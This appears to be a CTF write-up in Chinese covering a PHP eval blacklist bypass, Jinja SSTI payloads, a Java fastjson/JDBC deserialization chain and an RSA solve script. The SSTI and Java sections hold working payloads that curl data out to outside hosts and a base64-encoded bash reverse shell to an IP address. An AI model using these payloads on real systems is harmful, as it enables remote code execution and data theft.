ezrce
<?php
// CTF challenge script ("ezrce"): prints its own source, then eval()s the
// `rce` query parameter after a keyword blacklist. It is the intentionally
// vulnerable target of the bypass described in the writeup below.
highlight_file(__FILE__);
//its a babe bypass
// All warnings/notices are silenced, so a rejected or malformed payload yields
// no diagnostic output beyond the alert() emitted below.
error_reporting(0);
if (isset($_GET['rce'])) {
if (!empty($_GET['rce'])){
// The input is lower-cased before filtering, so any blacklist entry that
// contains an upper-case letter ("SplFileObject" below) can never match.
$printValue= strtolower($_GET['rce']);
$banned = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
// Variable-variable assignment: this defines $test = "/flag", i.e. the flag
// path is stored in a local whose own name ("test") is not on the blacklist,
// while the word "flag" itself is.
$special_block= "test";
$$special_block= "/flag";
foreach ($banned as $value) {
// strpos() returns 0 when the banned word sits at offset 0, and 0 is falsy, so
// the first operand only fires when the word appears later in the string; the
// regex is the effective check. Note the stray space before "escapeshellarg"
// (that alternative only matches " escapeshellarg"), the duplicated
// "getallheaders|strrev" alternatives, and that "\$[a-zA-Z]" forbids only a
// literal `$` immediately followed by a letter. A keyword blacklist in front
// of eval() is not a security control; the mitigation is to never eval()
// request data.
if (strpos($printValue, $value) || preg_match('/system|exec|bin2hex|assert|passthru|shell_exec|escapeshellcmd| escapeshellarg|pcntl_exec|usort|popen|flag|special_block|require|scandir|include|hex2bin|getallheaders|strrev|getallheaders|strrev|\\$[a-zA-Z]|[#!%^&*_+=\\-,\\.:`|<>?~\\\\\\\\]/i', $printValue)) {
$printValue="";
echo "<script>alert('Bad character/word ditected!');</script>";
break;
}
}
// Executes attacker-controlled input in this script's scope, where $banned,
// $special_block and $test are all visible. After a blacklist hit $printValue
// is "" and only ";" is evaluated.
eval($printValue . ";");
}
}
?>
离谱的bypass
国外的一道原题
https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse
非常巧妙的利用了变量覆盖的方法
echo+'';print(eval('return ${banned}[4](${test});'))
babyssti
看下过滤(当然不止)
https://saucer-man.com/information_security/516.html#cl-6
{{
[
空格
'
.
{% if ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:4444/?i=`whoami`').read()=='p' %}1{% endif %}
http://127.0.0.1:5000/?name={{()|attr(%22__class__%22)|attr(%22__base__%22)|attr(%22__subclasses__%22)()|attr(%22__getitem__%22)(133)|attr(%22__init__%22)|attr(%22__globals__%22)|attr(%22__getitem__%22)(%22popen%22)(%22whoami%22)|attr(%22read%22)()}}
{{()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("whoami")|attr(%22read%22)()}}
{% if ()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("curl http://boxtkv.ceye.io")|attr(%22read%22)()=="p" %}1{% endif %}
{%if()|attr(%22%c%c%c%c%c%c%c%c%c%22|format(95,95,99,108,97,115,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,98,97,115,101,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(132)|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,105,110,105,116,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,108,111,98,97,108,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(%22popen%22)(%22curl$IFS$9http://794828630:2333?c=`cat$IFS$9/fla""gasdcccccc|base64`%22)|attr(%22read%22)()=="p"%}1{%endif%}
过滤了蛮多的,重要的是需要自己搭个环境
flask环境和python脚本环境完全不一样的,主要卡在这里了
easy_java
把jar包还原成项目
本地搭建,审计
在admin路由这里可以自定义jdbc的参数,而jdbc存在反序列化
第一步,admin伪造绕过
在register路由这里
只要匹配到{username},就会替换
https://wx.zsxq.com/dweb2/index/topic_detail/182585211588122
而p神的知识星球说明了fastjson支持注释,利用注释饶过正则匹配
http://127.0.0.1/register?user=%7B%22username%22%3A%2F*penson*%2F%22admin%22%2C%22password%22%3A%22guess%22%7D
把admin注进去
登录拿session进admin
接着就是jdbc反序列化
看到jdbc版本是8的
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
jdbc:mysql://47.96.31.86:7700/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
easy_rsa
羊城杯的原题
[羊城杯 2020]Power
抄脚本改一下
import sympy
import gmpy2
from Crypto.Util.number import getPrime , long_to_bytes
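# easy_rsa solve script: the challenge leaks x = 2021*p**3 + 2019*p**2 + 2020
# together with the ciphertext c and dp = d mod (p-1). Recovering the integer
# p from the cubic lets m = c**dp mod p be computed directly. The cubic is
# solved with exact integer bisection, so sympy/gmpy2 are not needed (the
# original called sympy.solve, discarded the result and hard-coded p).
x = 4081589335861545789835900064099635357096399307337433897589803884626402434977432990016139226375481290410727489054239869962196583881117103323966736211566475539446678319618093115175112507069500173061215448325773249332796885624377362206444530510862480133054015065963334293387568286441905700716121965839808869357354006128877042545439515369257271569914721144973246451659098340370835404858757446411467741537214371880806558890311566169561294743201198192296369009590146133590
c = 25562696992733536309182393779981779194240154099429561071032280334763645594896471389578060860342401623942484948987716140390982592619521666792424752334479246961649746061040166020085170757237115563084113762532741403917411315342519136738879919867100264184573200481028092895743894796816962164203221470918044930335749213176218455777516922130048195365976773635904361747281900075574599122502341481491609282116651135302435182241327211649334973233884028113185901584769019028117675925853042867198133957188908318016744666365319241377018102421574351449756122789387653293735302629918910002538784361049010374950779639892697081213057
dp = 5260952459703133229911581653786151165351615592380635657675026312493642098695058018540694433892583077117305420684484097529438374197142471836138466810277803


def integer_cubic_root(target, a=2021, b=2019, k=2020):
    """Return the non-negative integer r with a*r**3 + b*r**2 + k == target.

    For positive a, b, k the polynomial is strictly increasing on r >= 0, so a
    bisection over [0, 2**(bits//3 + 1)] locates the unique candidate exactly
    with integer arithmetic only (no floats, no symbolic solver).

    Args:
        target: the leaked value x.
        a, b, k: polynomial coefficients (defaults match this challenge).

    Raises:
        ValueError: if no non-negative integer root exists.
    """

    def poly(r):
        return a * r ** 3 + b * r ** 2 + k

    if target < k:
        raise ValueError("no non-negative integer root: target below constant term")
    # target < 2**bits implies cbrt(target) < 2**(bits/3) <= 2**(bits//3 + 1),
    # and a >= 1 keeps poly(hi) >= hi**3 >= target, so hi brackets the root.
    lo, hi = 0, 1 << (target.bit_length() // 3 + 1)
    # Find the smallest r with poly(r) >= target.
    while lo < hi:
        mid = (lo + hi) // 2
        if poly(mid) < target:
            lo = mid + 1
        else:
            hi = mid
    if poly(lo) != target:
        raise ValueError("no integer root: polynomial does not hit target exactly")
    return lo


p = integer_cubic_root(x)
# With dp = d mod (p-1), pow(c, dp, p) equals m mod p (Fermat); as in the
# original script this assumes the plaintext m is smaller than p.
m = pow(c, dp, p)
# Big-endian encoding of m; matches Crypto.Util.number.long_to_bytes, including
# its single zero byte for m == 0.
print(m.to_bytes(max(1, (m.bit_length() + 7) // 8), 'big'))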